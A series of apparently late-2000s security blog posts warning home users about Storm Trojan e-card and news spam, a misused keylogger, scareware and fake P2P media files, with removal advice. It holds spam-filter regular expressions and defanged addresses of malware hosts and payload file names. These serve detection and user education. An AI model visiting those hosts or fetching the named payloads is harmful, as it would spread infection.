The fake news alerts I referred to earlier usually have sensational subjects and short descriptions in the body, some of which match the subject, but some of which are totally unrelated. There may or may not be links to a real news website, but there is always one or more to a compromised computer or website, or directly to a hostile file. These hostile links may have the text "Read More," or "Watch Video," or "Play," etc. If you mouse over the links you will see the real destination in the status bar of your browser, for browser-based email, or your email client. They will not lead to CNN, or the news agency they claim to represent, but to a strange web site, or numeric IP, where you will be attacked by all manner of exploit codes.

If these automatic exploits fail to infect your computer you will be offered a manual link to do it to yourself. This is usually in the form of a pop-up about your needing to download a new version of ActiveX Object, or Flash Player, or Video Codec. Some of the most recent spam messages I have seen this week have direct links to download Trojan files. They are disguised by words like Play, Movie, Watch(it), Video, etc, to make you think you are going to see a movie clip about the news in the spam message. Instead, you will become instantly infected with whatever Trojan is being hosted on the destination web server, or zombie PC.

If you want to read the news online just go to cnn.com, or abc.com, etc, and read it. If you subscribe to breaking news alerts you could be fooled into opening a scam message that uses a subject and body text and images stolen from CNN, MSNBC, Reuters, or the BBC. Because of these scams being in the wild right now, and being so hard to authenticate, you are best to download a news widget from the organization to which you wish to subscribe. CNN has a breaking news widget that sits in the Windows System Tray until a news alert comes through. Then, it opens a balloon message above the System Tray with the headline displayed. If you click on the story it will open in your default browser. Other news organizations may offer a similar widget. Just be sure you go directly to the news website to look for it. Do not click on links in unsolicited email messages.

The volume of these messages is increasing, not decreasing and the subjects, body text and link anchor text is morphing on a daily, or bi-daily basis. Learn to spot these scams and delete them from your inboxes. If you have a real email client that allows you to create filter rules, just add the subjects to your blacklist. If you use MailWasher Pro to screen your incoming email for spam or link threats you can download and install my custom MailWasher Pro filters, which are updated frequently to detect these ever changing scams. Since the Trojan video link spams began pumping out a couple of weeks ago I have sometimes been updating my published MailWasher filters on a daily basis. Contact me if you wish to consult with me about anti spam solutions.

Continue reading "Botnets ramping up efforts using news headlines and video links" »

Posted by Wiz at 1:51 AM | Permalink

back to top ^

For the last week I have been seeing a lot of people visiting my blog looking for information about a program called SpyBoss Pro. Apparently, they have discovered it on their computers and don't know how to get rid of it. Let's learn a few things about the program and how it can be removed.

First of all, this is not your typical piece of malware. It is a commercial keylogging application, selling for $25 and up, requiring a license to use it after 30 days. It is distributed by a company in Ohio and is actually targeted at company security departments, to track employees' use of the Internet, or to allow concerned parents to track where their children go and what they type in chats and IMs. According to the manufacturer, here is what it is designed to do.

Records chats, instant messages, emails, web sites visited, what is searched for, what is done on MySpace.com, pictures posted and looked at, keystrokes typed, the programs run and more.

If you have discovered this program on an office computer you should tell your superior. It may or may not have been installed by your company. If it was you are being monitored officially. If not, somebody may be stealing confidential company information. If you find it on your home computer and did not knowingly purchase it, it was installed by stealth by persons up to no good. They may have used trickery to get this program onto your computer for two reasons. First, they might be affiliates earning commissions for every installation containing their affiliate codes. Second, they will be able to capture logins to your banks and other financial institutions where they will steal your money, or sell your information (and identity) to the highest bidder.

How to remove SpyBoss Pro.

You're gonna hate it when I tell you that since this is a legitimate program, albeit misused by hackers and overzealous affiliates, it comes with a standard Windows Uninstaller. Go to Start > Settings > Control Panel > Add/Remove Programs. Look through the list of programs until you find SpyBoss Pro and uninstall it using the "Remove" button, then reboot. This is assuming that the program hasn't been tampered with (cracked), but in case it has been altered by hackers, you should download, install and update Spybot Search and Destroy, then "immunize," then "check for problems." If the uninstaller failed to remove all or any of SpyBoss Pro - Spybot will finish the job for you. Best of all, Spybot S&D is free, supported totally by donations from grateful users. The latest definitions already detect and will remove this keylogger.

It is good practice to turn off Windows System Restore when disinfecting a PC, because many infectors hide their components by modifying critical system files, or registering their files as system files. Those files are backed up in the System Restore folder and tend to be reinstalled if fond to be missing, on the next reboot. That's why some viruses and spyware keep coming back; they were backed up in your System Restore folder. If the uninstaller does remove SpyBoss Pro and Spybot doesn't find any further instance of it, you're probably good to go. But, if it still lurks after running the uninstaller, turn off System Restore, disinfect the computer, scan again, then turn on System Restore, when all is clear.

Follow-up actions

Since you know that there was an unwanted keylogger on your computer you need to change the login passwords to any banking, payments companies, auction sites, or online store accounts that you may have used while the keylogger was active. Check all balances and report any discrepancies to the fraud departments of these companies you do business with. You may have to cancel your debit or credit card and have a new one issued. If you cannot login to an account which you could before, go to the home page and search for contact information. They probably have a phone number you can call to report that you have become the victim of a keylogger. Many banks and payment portals will reverse any fraudulent transfers and get your money back, after you prove you are really you.

Continue reading "How to remove SpyBoss Pro from your computer" »

Posted by Wiz at 3:08 PM | Permalink

back to top ^

There is a new malware threat in the wild circulating among various file sharing networks. The threat is spread by duping file sharing users into downloading fake mp3 audio and mpeg movie files, which have very enticing filenames (some listed below in extended comments). All of these fake files have very small file sizes, which should be a giveaway that something is wrong with them. Despite that fact, almost 400,000 PCs are now infected in just a few days, after their users downloaded and opened some of these rigged files.

When a file sharing user double-clicks to play one of these files they get a surprise. Instead of seeing a movie or hearing a music file they are presented with a browser page that displays a EULA consisting of about 4800 words. The scam tells them that they must install a special media player, from fastmp3player.com - to playback the file they are trying to hear/see. Upon agreeing to the EULA the user is redirected to fastmp3player.com where a file download box appears, for a file named (at this time) "PLAY_MP3.exe." This file will install two separate adware and spyware applications; "FBrowsingAdvisor" and "SurfingEnhancer."

Apparently, in samples that have been analyzed in the last two days, these attacks are specifically designed to work in the Firefox browser. If Firefox is not found on the victim's computer, they will get a Windows error message and will be urged to download and install Firefox.

Most major anti virus and anti spyware companies can already detect and remove this threat, which has been elevated to a "medium threat" status by McAfee, for home users.

People who like to obtain copyrighted music or movies without paying a fair price for a licensed copy are left at risk from botmasters looking to increase their botnets, and criminals using affiliate programs to earn commissions for installing spyware and adware onto as many computers as possible.

What you can do to protect your computer from this threat.

1. Stop using file sharing programs like Limewire or Kaaza, or others, that allow people to distribute (share) copyrighted works illegally. They are riddled with malware files of all sorts. Instead, use one of the legitimate music or movie websites, like Apple's iTunes, Real Rhapsody, or Napster.


2. Install a modern, legitimate anti virus program that offers multiple daily updates and set it to receive automatic updates every hour. If you can't set it to an hourly schedule then run a manual check for updates as often as you think about it. Or, use Windows Task Scheduler to run the updater executable every hour. Reputable anti virus companies include Trend Micro, Symantec, McAfee, NOD32 and AVG.


3. Install a reputable anti spyware program and keep it updated as often as possible. Recommended companies include PCTools Spyware Doctor, Webroot's Spy Sweeper, Trend Micro PC-cillin, Lavasoft's Ad-Aware and anti-virus, and Spybot Search and Destroy.


4. Scan for threats every day, before you get busy online, or every night, before you turn off the computer for the night.

Posted by Wiz at 11:30 PM | Permalink

back to top ^

The infamous Storm Trojan Botnet has reawakened again, after a brief sleep. It last made it's appearance towards the end of January, stayed active until Valentines' Day, then disappeared. Since July of 2007 the Storm Botnet is most well known for sending out spam messages containing links to view e-cards, or postcards. All of the resulting web pages are hosted on other storm infected botnetted computers and all of the links lead to your PC being infected with the same Trojan.

One of the things that made Storm Trojan links stand out last year was that most of them were numeric IP addresses, rather than domain names, in their links. These links resemble this example: ht*p://123.123.123.123/(some garbage characters may follow). During the last quarter of 2007 the Botnet began using actual registered domain names to reach the target host computers, which are managed on what is known as a Fast-Flux DNS network. Most of these domain names were registered within a few days of the spam run and are usually allowed to die shortly thereafter.

The Storm has become active again and is once again spamming out email messages about e-cards and postcards, most containing the good old numeric IP links. All of the targets are infected PCs and if you are duped into clicking on a link to such a target, exploits await you, including an automatic download of the Trojan. Should this fail, you will be enticed to click on a link, or an image to begin your download, supposedly to view your e-card/postcard. At this point, if you are running a Windows based computer, with Administrator level privileges, your PC is about to become a zombie member of the Storm Botnet.

If you receive one of these e-card/postcard notices delete it immediately. If the sender looks like a name you know, check the email address to see if it matches that name. If in doubt, contact that person to see if they knowingly sent you an e-card, from that particular e-card company. Chances are they won't know anything about it. You see, the names and addresses used in the From fields are all harvested from infected computer contact lists and address books. All spam email messages since late 2006 have totally forged From and Reply to email addresses. The people whose names and addresses are being used have no idea this is happening and cannot stop it. If you have sent an email to somebody whose computer gets infected with an email harvesting trojan or Worm, your email address will not only receive spam, but will be used in forged From and Reply To fields of spam messages. There is nothing you can do about this. Even my accounts have been harvested from computers of customers and friends and I see spam coming to me, supposedly From me!

Unwanted E-Card/Postcard = DELETE! Leave the curious George stuff to professionals like me and the anti-exploitation labs.

Posted by Wiz at 3:08 PM | Permalink

back to top ^

Most experienced Windows PC owners know by now that their computers are the primary targets of every type of malware exploit that can be conceived by man or machine. Prudent PC owners take extra precautions and ensure that their computers are protected and scanned regularly, with up-to-date anti virus and anti spyware programs. The also tend to use more secure browser settings, or switch to Firefox for their Internet browsing, instead of Internet Explorer. Yet, millions of PCs are infected every day, with all manner of spyware and viruses, with many of them belonging to fairly new computer users (Newbies). Why is this?

A lot of the reason for the constant increase in infected computers is due to inexperienced, or unaware Windows PC owners operating without proper and active security protection onboard. I have disinfected lots of computers that had either no virus protection at all, or had expired anti virus applications on them. An expired product is as useless as if it wasn't there, and gives a false sense of security to untrained PC users. Most of these products ship with new computers and offer a free 3 or 6 month trial period, after which they become inert, unless a subscription is paid for to keep them updated with new threat definitions.

This background information leads into the subject about which I am posting today. It has to do with a brand new malware threat that is in the Wild, calling itself: "MonaDonaRona." This is a malware "Trojan" that is acquired by downloading and installing a fake software program called RegistryCleaner 2008, although there may also be other means of delivering the infection. Once MonaDonaRona is installed on the victim's PC it pops up an ominous alert, identifying itself by name, and proudly proclaiming its intention to cause harm to your computer, currently using this text:

"Welcome to MonaRonaDona. I am a Virus & I am here to wreck your PC. If you observe strange behavior with your PC, like program Windows disappearing, etc., it's me who's doing this."

This pop-up alert and strong language is meant to panic unsuspecting victims into paying to have it removed by a fraudulent anti virus program, which is a companion to this threat. People who are duped by this two handed ploy will have the MonaRonaDona alerts turned off by the companion malware application, which they had to pay for to use. This is also known as extortion-ware. The MonRonaDona component is only there as bait for the fake anti virus program, which the perpetrators of this fraud want to sell, for about $40 US. The fake anti virus product may be called "Unigray," or other names. It is apparently not linked to directly at this point in time, but the victim is expected to search for anti virus programs that specifically target it.

False information about the fake anti virus program has already been spammed to Google and other search engines, through phoney blogs and spam blog postings, poisoning the results pages. If the victim searches for help removing MonaRonaDona, they will most likely see the fake products listed at the top of the results. This is a new method of delivering fraud-ware, by gaming search results and panicking users into searching for the spammed, fake removal tool.

The fake removal program will tell MonaRonaDona to shut itself down, making the victim believe that the anti virus program actually removed it legitimately. But, this is merely a ploy. Most free anti virus and anti spyware programs will detect and remove this threat within a few hours of its discovery, if you check for updates every day, several times a day.

Early credit for this discovery goes to Eugene Kaspersky and his famous, commercial Kaspersky Anti Virus products. They are often first to intercept malware that comes from certain regions of Russia where much of the World's malware is written and launched.

If you don't have any up-to-date anti virus protection on your Windows PC, give TrendMicro a try. If you can't afford to buy commercial anti virus protection there are various free programs available. I would unhesitatingly recommend AVG Free, although Avast! is also very good.

Continue reading "Watch out for a new fraudulent anti-virus ploy named MonaDonaRona" »

Posted by Wiz at 3:38 PM | Permalink

back to top ^

Malware

Computer programs coded - or modified - to endanger your computer, or compromise it's security, or make it part of a Botnet, or display unwanted advertising pop-ups, or defraud you, or steal your log-in user names and passwords, or your identity.

Malware includes computer viruses, Trojans, backdoors, rootkits, spyware, adware, keyloggers, dialers and rogue (fake) anti-spyware and anti-virus programs.

All of the above mentioned malware types are threats to anybody running a Windows based operating system, especially when they are connected to the Internet. There are malware threats that are specifically targeted at other operating systems, like MacIntosh and Linux, but they are less prevalent, mostly due to the smaller installed base of those OS's. Some come to you over the wires, so to speak, via TCP/IP attacks against open "ports." A router between you and your external broadband modem can stop those attack vectors (unless you have poked holes in the router's firewall). However, no common router has the means of protecting you against malware threats that come in as you read email, or use your Internet browser. Unless you have an advanced router that receives regular updates to it's malware detections, you will need to keep a software firewall running on your computer, to protect it against hostile incoming TCP threats.

Malware threats do not just come from the Internet. I got into computer troubleshooting before I was connected to the Internet, due to an infected floppy disk. Floppies are mostly gone nowadays, but there are still some CD's, DVD's and plug-in memory devices that are somehow infected before going to, or during production. Then, you have certain music companies who knowingly install programs onto their CD's, which install rootkits onto the computers of legitimate buyers, to prevent copying those CD's (DRM protection). This was done a couple of years ago by Sony-BMG. Those DRM rootkits were then exploited by cyber-criminals to install other, much more dangerous types of malware.

Every week or two there seems to be a new type of malware attack method discovered, as well as constant variations of existing methods of infection. This article will review the latest methods of delivering viruses, spyware, rootkits, backdoors, keyloggers and Trojans to your PC. All of the threats listed are already "in the wild." Most of them are being used to draft unprotected, or insufficiently secured Windows PC's into Botnets. Others are used to steal login information to websites control panels, servers, banks, eBay, PayPal, or similar institutions. Then there are the pop-up ad windows that can render a computer unusable, and rogue anti-spyware programs that trick you into paying to remove the threats that the program itself invented, or installed. Your best defense against all of these threats is to keep a firewall running at all times, keep the most current version of anti-virus and anti-spyware programs working and updated, and keep fully current with Windows or MacIntosh security patches and updates (yes, Apple releases security patches too).

The most prevalent malware threats, in the Wild, include the following (The Dirty Dozen):

• Lunar eclipse video scam - link leads to Trojan and Botnetting if clicked


• IRS rebates and refunds phishing scams - targets US citizens by mail or phone


• Bank Of America phishing scam


• Hillary Clinton video download scam - link downloads a Trojan if clicked


• Britney Spears and Paris Hilton video scams - link downloads a Trojan if clicked


• Storm Trojan numeric links in spam emails continue, but are reduced.


• Thousaands of compromised web servers are still allowing JavaScript redirection exploits to occur, leading to stealth download infection attacks to many visitors of the web sites hosted on those servers.


• Compromised individual web sites have had hidden iframes installed, by criminal hackers, leading to instant infection of insufficiently secured PC's visiting those web sites.


• Adobe Reader had a vulnerability that, if exploited, allowed complete computer takeover. Everybody using Adobe Reader or Acrobat should be sure they update to the latest, patched version. Use the program's Help menu to check for updates and install them.


• Apple QuickTime exploits are in the wild. Make sure you update to the current version.


• There are Java virtual machine exploits on compromised web pages. Make sure you computer has the latest version of Sun's Java.


• Finally, rounding out the Dirty Dozen, certain brands of wired and wireless routers are being targeted with DNS redirect attacks. This involves sending code, from simply opening a hostile spam email message, to the targeted router, which reprograms the router to send users to a phishing banking website, or other financial institution, if you try to logon to that institution. Router exploits that are in the wild were recently successful against millions of Mexican DSL routers, many of whose owners used the bank that the redirect was aimed at. All of these router attacks depended on the users not setting a personal Administrator password! Those with a password were not affected.

What you can do to protect your PC and your identity

If you have a Mac OS PC, make sure you check for updates at least once a month, or turn on automatic checking for security updates. Mac's "Finder" has a link to check for Apple Updates. If you have iTunes installed, it may need updates occasionally as well.

If you have a Windows PC, the quickest method you can use to check the security level is to visit the security website, Secunia.com, and run their online Secunia Software Inspector (requires Java). After you read the instructions and click on Start, a second page will load, then click on Start on that page and it will scan your PC for vulnerable software in it's database, and missing Windows Updates. If the Software Inspector finds out dated versions of software it will highlight them with a red mark and expand their details to tell you what vulnerability exists. It will also provide a direct link to the applicable page where you can download the patched version. Sometimes, Secunia will locate an older version of Flash, or Java, that has been left behind after updating to the current version. It will show the locations of those still-vulnerable files, which you should manually delete, or uninstall (Control Panel > Add/Remove Programs).

To protect your router from code exploits, establish a unique Administrator password (do not use the word "password"), disable remote administration and turn off UPnP. If you have a wireless router, setup the best level of encryption your receiving computers can work with. Most broadband routers come with a firewall, with configurable rules and a means of "poking holes" in them. Make sure your router's firewall is turned on and do not allow any port holes unless they are necessary for your personal or business use (e.g: filesharing, VPN, remote desktop, ftp. etc). Routers use "NAT" to hide your personal network computers from the public Internet. This makes them a less visible target for TCP/IP exploits.

Finally, if your PC shipped with a free trial version of a security program and it has expired, and you have not paid to renew it, you had better either pay for it, pay to upgrade it, or uninstall it and get a different security program. An expired anti-virus or anti-spyware program is totally useless and it's only current affect is to eat up valuable system resources! There are many fine security programs available, both in retail stores and online. I have ads for several brands on this blog and on my other web pages, all of them reputable. However, I have my eye on one in particular that seems to be pulling ahead of the others, especially in the area of intercepting web site borne malware threats. That company is Trend Micro. They have a technology that is included in the Trend Micro Internet Security 2008, also known as "PC-cillin," that analyzes the content of web pages you visit, screening them for either known hostile codes, or potentially hostile embedded exploits, based on heuristics. If such codes are discovered Trend Micro's web threat protection will block the harmful content, while allowing safe content to be delivered. Or, it can block the entire web site from downloading anything, if you prefer. This type of defense is invaluable when you consider that much of today's malware is being delivered through website exploits and hidden redirects.

The Trend Micro Security Suite 2018 also comes with a two way firewall, anti-virus, anti-spyware and anti-phishing protection, with multiple daily automatic updates, all for a reasonable subscription price and allowing you to protect up to three PC's under one license. Get 10% Off a 1 year subscription to Trend Micro Internet Security 2008, using Coupon Code: TrendIS08.

Posted by Wiz at 1:17 PM | Permalink

back to top ^

First, some background information about the Storm Trojan.

Since July 1, 2007, I have written several blog articles warning people to be on the lookout for email scams that contain links that cause Windows computers to become infected with the Storm Trojan. This malware threat has already infected more PCs than any other in the history of personal computing. In August of 2007 estimates put the total number of infected computers at anywhere from 1 million to over 5 million! All of the infected computers acquired the Storm Trojan through social engineering trickery of their human owners.

Early varieties of the Storm Trojan, which began circulating widely in January, 2007, used catchy news headlines (some true, some false), such as news of hundreds of people killed by storms raging across Europe. Early payloads were carried in hostile attachments, offering more information or the full story, but were rigged with the Storm Trojan malware. Later, in mid-2007, the authors began shifting away from using attachments and started providing links to the already infected computers, which were now used to host web pages that carried exploit codes and copies of the Trojan itself. The owners of these computers had no idea that their machines were being used for this purpose, and other purposes even more sinister.

It was in June 2007 that I began to notice suspicious numeric links in email spam messages, that characterized the new breed of the Storm Trojan. There were several phases where different techniques were employed, all designed to appeal to human curiosity and which snared more and more unsuspecting victims into the ever-growing Storm Botnet. There were e-cards, postcards, verification messages, free music, free games, funny cats, dancing skeletons, Naughty Christmas cards and now, New Years greetings postcards. All of these scams contain a link which the person reading the email must click on. If you are running a windows computer that has not been fully patched against all known vulnerabilities in the wild, and you clicked on one of those links, chances are good that your computer has become a "zombie" member of the Storm Botnet.

Most of the time, the owners of these compromised machines don't know what is happening behind the scenes, as all of this activity is hidden from the user interface. The only give-away that something is amiss would be occasional unexplainable computer and Internet slowdowns, along with periods of high activity on their (external or broadband) modem "activity" lights, as thousands of spam emails, or DDoS attacks are launched from their computer. So, aside from flickering modem lights, how can you tell if your Windows computer has been infected with the Storm Trojan?

Since the Storm Trojan has been around for about a year now, it is safe to say that all anti virus and anti spyware programs have definitions to detect and eliminate this threat. If you have an anti virus and/or spyware program, make sure your scanning engine is fully current, and the definitions are up to date, then reboot into Safe Mode and scan all files. Safe Mode scanning is recommended, because, although the Storm Trojan installs its "service" as a hidden "rootkit," it still has supporting processes and files that can be stopped and deleted from Safe Mode. After the support files and registry entries are terminated the rootkit infector will be vulnerable. With any luck your security program will find and remove the files and services associated with this Trojan.

If you don't have an anti virus or anti spyware program on your Windows computer you are probably already infected with all manner of malware. There is a manual method that you can use to determine if your computer has/might have the Storm Trojan. A rootkit keeps its own main operational files from being viewed in Windows Explorer, or in Command Windows, by intercepting attempts to find those file names, or slight variations of their names and sending a null result to the screen. These are known as "super hidden" files. So, if your computer does have a rootkit infector and you were to look for their presence using a Windows Search, or a "Dir" command in a DOS Command window, the rootkit file(s) would not reveal themselves to you. Interestingly, if you were to create a new text file on your Windows desktop, with the same prefix as the rootkit's files, that file would instantly disappear from view, or would not appear in a DOS Window directory listing.

While the Windows desktop file may or may not work as described, a Command Window can be used to reveal the presence of the Storm Trojan's rootkit.

Since Windows Explorer refuses to display super hidden rootkit files and services, a good old DOS window and some special commands might do the trick, by hiding a specially named file that you just created. Here's what you need to do to check for the presence of the Storm Trojan rootkit component.

1. Go to Start > Run and type in: CMD and press Enter


2. A "Command" Window will open, with a blinking cursor, waiting for text input from you.


3. Case doesn't matter with these commands.


4. In the Command Window type this: copy con spooldr.txt


5. Press Enter. The blinking cursor should move down to a blank line.


6. Type a few words to create some filesize, then press F6. You should see a ^Z, after the last character that you typed.


7. Now, press Enter. You should see "1 file(s) copied" and the cursor will blink again on a new command line.


8. At the blinking cursor, type: DIR spooldr.txt and press Enter.


9. If you see a report showing 1 file(s) and a filesize in bytes and the file name, you have passed the first test.


10. Repeat rules 4-8, substituting these filenames each time: noskrnl.txt, wincom.txt, clean.txt, bldy.txt


11. If all of these files are listed in the DIR results, you're probably ok (the file names are now being changed frequently), but, if the DIR command shows 0 files found for any of these files, you are infected with the Storm Trojan and it's rootkit.


12. If all of these files show in a DIR listing, you should delete them by typing: DEL filename.txt (substituting the actual filenames) and press Enter and the named file will be deleted.

I advise you to leave disinfection of rootkit threats to professional grade security applications, like Norton, McAfee, Kaspersky, or TrendMicro Anti Virus programs, or Webroot Spy Sweeper, or PCTools Spyware Doctor. There are links to some of these programs on this blog. Some of them offer a free trial download, and others offer a free online scan. If you can't afford one of these commercial programs you can download (install and update!) AVG Free Anti-Virus, or SpyBot Search and Destroy, which is also free, from the links in the right sidebar >>>

If I come up with some effective manual removal instructions, that can be used by the average computer owner, I will post them in a follow-up blog article.

Posted by Wiz at 5:40 PM | Permalink

back to top ^

This is a heads up to you all to beware of a new round of Storm Trojan email threats, now making the rounds. They contain a New Year subject and one line of body text and a link on the second line that contains the word postcard, or a variation thereof. Do not click on this link. Delete the message. The destination is a Storm Worm Trojan infected computer, running an Nginx small web server, with but one page. The page contains code to instantly redirect you to an automatic download location, where you will receive your very own copy of the Storm Trojan. If you visit the first page with JavaScript disabled, you will be presented with an enticement to manually install the Trojan; to view your "postcard." Not! The three spammed email messages I analyzed this morning all contained variations of the following two lines of deactivated text:

As the new year...
h**p://uhavepostcard.***/

That URL was spammed out on Christmas day, three days ago. The current Storm Trojan spam messages now have links to happycards2008.com, or newyearcards2008.com, or familypostcards2008.com, which are different URLs than in the attacks that began on Christmas Day and more changes are expected over this weekend.

The emails I have analyzed so far today led to infected computers, with web pages containing a clickable link to a locally hosted file named "happy-2008.exe," or "happynewyear.exe," which is the Storm Trojan itself. The infected host computers are zombie members of the Storm Botnet and are all over the World. The redirects in them lead to exploited servers, similarly all over the World. These servers have been compromised over the year in anticipation of serving up payloads on demand. They are zombie servers in that no unusual activity would be noticed from them until people start arriving from redirects on infected PCs. Unless people report these infected servers they will remain online long enough to do a lot of damage. One way to report them is to become a reporting member of SpamCop.

If, like me, you use an anti spam front end for your email client, such as MailWasher Pro, and it allows you to create regular expression spam filters, try adding these rules to detect the Storm Postcard threats:

UPDATED 12/30/2007 to add new target domain names and shorter RegExpr.
The subject contains any of these words: "(e-) card, or greeting, or postcard, or New Year, or New 2008 Year"
AND, The body contains any of the same words; AND
The body contains a hyperlink containing this regular expression:

http://(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/|(.+postcards?|newyearwithlove|.+cards2008)\.com)

Here is that entire updated rule, in MailWasher Pro format, for use in the MailWasher filters.txt file (This code should be on one long line):

[enabled],"Postcard Trojan Scam","Postcard Scam",16711680,AND,Delete,Automatic,Subject,containsRE,"\b(e-?)?(card|greeting|postcard|new\ year|Happy\ 2008!|New\ Hope\ and\ New\ Beginnings|new\s.*year)",Body,containsRE,"\b((e-?)?(post|greeting\s)?card)|new\ year\b",Body,containsRE,"\bhttp://(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/|(.+postcards?|newyearwithlove|.+cards2008)\.com)"

I am posting updates as I detect changes to the target domain name or subject/body text. Remember, the authors of the Storm Trojan are constantly altering the text and payload URLs, to fool spam filters and people. If you are not screening your incoming POP email you leave your computer at risk, should one of these threats fool you into clicking on a link to an infected computer, or server. I have a full page describing the email screening program - MailWasher Pro, with links where you can download it for a free trial. It is very inexpensive to license, for the life of the product. You don't have to pay for version updates like you do with most security programs these days. The only recurring charge associated with MailWasher Pro is voluntary membership in their managed spam reporting group, called FirstAlert.

MailWasher Pro is free to try for 30 days, and still costs only $37.00 to register, which includes a one year, renewable subscription to the FirstAlert! spam reporting system, plus, FREE Mailwasher program updates for life.

Posted by Wiz at 10:36 AM | Permalink

back to top ^

The so-called Storm (Worm) Trojan has been continuously changing the subject and body text used to trick victims into clicking on links which cause their computers to become part of the "Storm" Botnet. Previously, all Storm scam messages came in with numeric links to compromised Windows computers, on broadband connections, which were a clear giveaway to even the most casual recipient that something was not right. Then, at the beginning of September I began to see Storm scams that had the numeric IP destinations wrapped inside a fake domain name. The true, numeric destination was revealed by mousing-over the link, so it was still relatively easy to detect that the message was most likely as scam.

It is extremely unusual for hyperlinks to be numeric, but not totally unseen. Most websites use a "friendly name" for the domain; like example.com. On very rare occasions a website may not use a friendly name, usually when it is in transit from one server to another, and DNS changes need time to propagate throughout the name servers system. In the case of the webpages hosted on Storm Trojan infected computers the URLs had to be numeric. This was because the zombie computers did not have registered domain names. Instead, they have a small web server, called NginX, installed by the Storm Trojan, and are usually always connected to broadband Cable or DSL Internet Services, with infrequently changing IP addresses. Since the IP addresses of these zombie computers do occasionally change, due to rebooting the modem, or forced IP renewals by their ISP, the authors of the Storm Trojan had to come up with a new way to keep them available through changes in IP addresses, and they have done just that.

In a new twist to the previous numeric IP scam, the authors of the new scam are using free DNS services to point their parked domain name servers to always on cable Internet computers that are part of the BotNet. Thus, if the intended victim mouses-over the link it still displays the friendly domain name (e.g: example.com). If they are fooled by the scam pitch into clicking on that link, they will arrive at what looks like a standard, large web page all about the subject of the scam message. There will be lots of links on that page, just like you would find on a real web page. But, in this instance, what you don't know can and will hurt you!

See my extended comments for a more technical description about this new NFL Tracker threat.

Your best defense against the Storm (Worm) Trojan, in all of its incarnations, is to use common sense and not click on links in unexpected emails, featuring dubious text sales pitches. If you use anti-spam software you should train it to recognize what you recognize as spam, or scams.

I use MailWasher Pro to screen all of my incoming email. It uses a variety of methods to identify and deal with known, or suspected spam email, including custom filter rules that define the kinds of spam that are most common. I happen to write and publish three sets of custom filters for MailWasher. They are in direct response to the daily variations in email spam and scam threats that I see as I check my numerous accounts on 12 minute intervals. While my filters admittedly slow down the processing of your incoming messages, they provide a defined warning in the Status field, indicating what types of spam filters have been matched. The first two sets of filters only flag spam that is matched by my rules, leaving you to decide if they are truly spam, or legitimate - false positives.

filters.txt is the largest set with rules going back several years, including the most current rules.

filters2.txt uses a reduced set of the most current filters, which I use a more potent version of.

filters3.txt is what I call my Judge Dread rules, because they, like my personal filters, are set to automatically hide and/or delete anything that is identified as spam. I describe them as my "Murder-Death-Kill rules," as borrowed from the movie "Judge Dread." In the rare instances where a legitimate email is automatically deleted by a filter, I can review and restore that message from the MailWasher Pro Recycle Bin.

To recap, the authors of the Storm Trojan are constantly changing the subject and body text, in an effort to deceive more and more people and to accumulate the largest BotNet in the history of distributed computing. As of this week, it is estimated that the Storm BotNet has more computer and CPU power than all five of the World's top 5 Super Computers put together. The damage that has been, is and may come from this BotNet is beyond anything ever seen on the Internet, until now. If all of these machines are used in DDoS attacks there is very little that would be able to stand up to them. That includes websites, governments, even entire countries (The country of Estonia was effectively taken offline by a huge DDoS attack, earlier this year).

I strongly urge every reader of my blog to install the best anti virus and anti spyware software that you can afford, keep it completely updated and scan for threats every night.

Continue reading "Storm Trojan now using real domain links in NFL Tracker scams" »

Posted by Wiz at 5:07 PM | Permalink

back to top ^

The authors and promulgators of the Storm Trojan are very devious and criminally clever people. Every month they seem to completely change the nature of the scams used in the spam emails sent from already infected computers. Each new scam uses a different type of social engineering to deceive spam recipients into clicking on the (numeric) link embedded in those messages. Usually the links are shown as numeric, but lately some are concealing the destination until you hold the mouse over the link, at which time you will see a numeric URL. An example of a numeric URL would be: http://127.0.0.1/. The same link wrapped inside a friendly name cover might resemble this: devious words, which leads to the same numeric destination, when you mouse-over the link. The destinations in my examples go to your own computer, at 127.0.0.1 (local machine), for safety sake.

Earlier this summer the trick most widely used was the postcard scam. Now they are kicking it up a notch and appealing to sports fans' curiousity; to fool them into infecting themselves. With the US professional football season kicking off this month (pun intended), the criminal minds authoring the Storm Trojan email scams have unleashed a series of new messages all aimed at enticing football fans into downloading a so-called "game tracker." As with all of the previous Storm Trojan payloads this one resides inside infected computers onto which a web server has been installed. If you click on the link in the scam email you will see a real web page containing all kinds of descriptions and links to features and information. There is even an image map that is one huge link. Every single one of the links on these pages go to one and only one place: "tracker.exe." Click on that and what you thought was a game tracker program will in reality turn your computer into another zombie member of the Storm Trojan BotNet.

Another trick being employed by the Storm Trojan is a link supposedly to a program that prevents the RIAA from tracking files shared illegally over peer to peer networks. Again, this is the Storm Trojan at the other end of those links.

If you use MailWasher Pro to screen your incoming email and are not already using my custom spam filters, what are you waiting for? They are free for you to use! They are my gift to the World. I hate spam and want to help others detect and delete it, before threats like the Storm Trojan can fool them into becoming unwitting victims. You can even discuss my filters in my own topic labeled: Wizcrafts Custom MailWasher Pro Filters discussed here, on the Firetrust.com forums.

Please use caution with any links arriving in email messages from senders you don't know, or even those you do know. Do not click blindly on links in emails, especially if they are numeric! Those IP addresses are infected home or office computers, on DSL or Cable Internet services.

Continue reading "New Storm Trojan tactic uses football game tracker as bait" »

Posted by Wiz at 10:59 PM | Permalink

back to top ^

This is a follow-up to an article I wrote about the Storm Worm, in my blog a couple of days ago. That entry was meant to warn you about the new variations in the subjects and body text, designed to trick you into getting your computer infected. This article presents a brief history and analysis of the methods used to infect computers, as well as a description of the actual payload, of the so-called "Storm Worm" Trojan downloader.

History of the Storm Worm Trojan

Distributed through massive blasts of spam emails, the threat now known as the "Storm Worm" Trojan-Downloader was first noticed in the wild in November, 2006 and has gone through many external alterations since then, although the payload has remained basically the same. Various anti virus companies have labeled the variants with such names as: Win32/Nuwar, Trojan.Peacomm, Trojan-Downloader.Win32.Small.DAM, Trojan.Downloader-647, Trojan.DL.Tibs.Gen!Pac13, Win32.Zhelatin, and of course: "Storm Worm."

